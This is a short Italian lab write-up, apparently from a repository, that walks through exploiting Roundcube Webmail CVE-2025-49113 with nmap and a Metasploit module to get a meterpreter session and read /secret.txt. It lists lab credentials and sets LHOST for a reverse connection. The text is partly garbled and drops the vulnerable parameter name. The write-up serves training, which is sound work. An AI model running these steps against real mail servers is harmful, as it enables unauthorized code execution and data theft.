Laboratorio pratico di sfruttamento per Roundcube Webmail CVE-2025-49113 (deserializzazione di oggetti PHP autenticata → RCE) per leggere /secret.txt.
"DICHIARAZIONE DI NON RESPONSABILITÀ: Solo a scopo educativo"
Questo repository documenta la mia sfruttamento passo passo di Roundcube Webmail CVE-2025-49113 in un laboratorio controllato per ottenere il segreto memorizzato in /secret.txt.
⚠️ Dichiarazione di non responsabilità
Tutto il lavoro è stato eseguito su un ambiente di laboratorio / addestramento che sono autorizzato a testare.
Non utilizzare queste tecniche su sistemi che non possiedi o amministri.
Roundcube Webmail è un client di posta elettronica PHP open-source basato su browser che si connette alle caselle di posta tramite IMAP e invia mail tramite SMTP. Comunemente funziona su Apache o Nginx con MySQL/PostgreSQL/SQLite ed è ampiamente utilizzato in ambienti di hosting condiviso.
Vulnerabilità – CVE-2025-49113
Tutte le versioni di Roundcube fino a 1.6.10 incluse (e 1.5.x prima di 1.5.10) contengono un bug critico in program/actions/settings/upload.php. Il parametro non è adeguatamente validato, il che consente a un attaccante autenticato di innescare e ottenere con privilegi del server web.
_fromCredenziali del laboratorio:
roundcubercpassObiettivo:
Qual è il segreto all'interno del file
/secret.txt?
nmapmsfconsole (Metasploit 6)172.20.2.57exploit/multi/http/roundcube_auth_rce_cve_2025_49113Comando: nmap -sV Target Machine
msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine
meterpreter > cat /secret.txt